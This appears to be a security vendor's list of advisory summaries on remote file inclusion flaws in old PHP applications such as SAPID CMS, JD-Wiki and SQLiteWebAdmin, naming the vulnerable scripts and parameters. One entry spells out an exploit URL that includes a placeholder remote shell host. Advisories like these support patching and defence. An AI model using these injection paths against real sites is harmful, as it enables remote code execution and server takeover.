A remote file include vulnerability exists in SAPID Gallery version 1. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request containing directory traversal sequences and a malicious file path. This can be exploited to execute arbitrary PHP code on the vulnerable system.
SAPID Blog version Beta 2 is vulnerable to a remote file include vulnerability. This vulnerability is due to the 'root_path' parameter in multiple scripts not being properly sanitized before being used in an include() function call. This can be exploited to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process.
SAPID CMS version 1.2.3.05 is vulnerable to a remote file include vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing an arbitrary file path in the root_path parameter of the get_infochannel.inc.php and get_tree.inc.php scripts. This will allow the attacker to execute arbitrary code on the vulnerable system.
Input passed to the 'DIR' is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
JD-Wiki is the Joomla! integration of the nice DokuWiki. DokuWiki is a standards compliant, simple to use Wiki, mainly aimed at creating documentation of any kind. This bug allows a remote attacker to execute commands via RFI. The path for the exploit is ?mosConfig_absolute_path= and the exploit is /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=http://shell
SQLiteWebAdmin is a simple PHP program for administrating a SQL DataBase. It suffers from a Remote File Inclusion Vulnerability. The bug is in the 'tpl.inc.php' program in the 'lib' directory, and is exploited when passing the parameter 'conf[classpath]'. Succesfull explotation, needs register_globals=on
The $Vb8878b936c2bd8ae0cab variable in the /templates/header.php file is not properly sanitized before being used, allowing an attacker to include remote files. This can lead to remote file execution.
A vulnerability in the news.php script of Torbstoff News 4 allows an attacker to include a remote file via the pfad parameter. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a malicious URL in the pfad parameter.
Input passed to the 'abs_path' parameter in global.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
Input passed to the 'abs_path' parameter in index.php is not properly verified before being used. This can be exploited to execute arbitrary PHP code by including files from local or external resources.
Services By CQR